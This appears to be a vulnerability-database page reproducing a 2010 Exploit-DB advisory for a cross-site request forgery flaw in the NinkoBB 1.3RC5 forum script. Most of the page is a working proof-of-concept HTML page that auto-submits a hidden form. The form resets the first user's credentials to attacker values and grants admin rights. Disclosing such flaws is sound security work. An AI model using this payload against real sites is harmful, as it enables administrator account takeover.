NinkoBB - Cross-Site Request Forgery

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1060622 漏洞类型
发布时间 2010-07-01 更新时间 2010-07-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/14147
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Title: NinkoBB CSRF Vulnerability
# Author: ADEO Security
# Published: 30/06/2010
# Version: 1.3RC5 (Possible all versions)
# Vendor: http://ninkobb.com
# Download: http://ninkobb.com/releases/?NinkoBB-1.3RC5.zip

# Description: "NinkoBB is an open source forum script written in the
PHP language and uses a MySQL Database.
NinkoBB is designed to be as simple as possible and provide you with
the key features that you need, all the while keeping the space used
on your server to a minimum.
Built to be simple, small, and easy to use with a user friendly
install for a quick setup, painless upgrade system, and easy to use
admin panel for managing your forum. Also includes support for
categories, plugins, languages, and themes."

# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
        - Mail: security[AT]adeo.com.tr
        - Web: http://security.adeo.com.tr

# Vulnerability:
If administrator of the board browse PoC attacker can gain privilege
access. See #PoC section.

# PoC:
<html>
<body>
<form method="post" action="http://ninkobb.test/admin.php?a=users&edit=1">
<input type="hidden" name="username" value="attackers_uname">
<input type="hidden" name="admin" value="true">
<input type="hidden" name="email" value="attackers_mail@mail.com">
<input type="hidden" name="npassword" value="adeopass">
<input type="hidden" name="npassworda" value="adeopass">
<input type="hidden" name="edit" value="submit">
</form>
<script>document.forms[0].submit()</script>
</body>
</html>


-- 
Canberk BOLAT
i'm currently intern @ ADEO Security
http://twitter.com/cnbrkbolat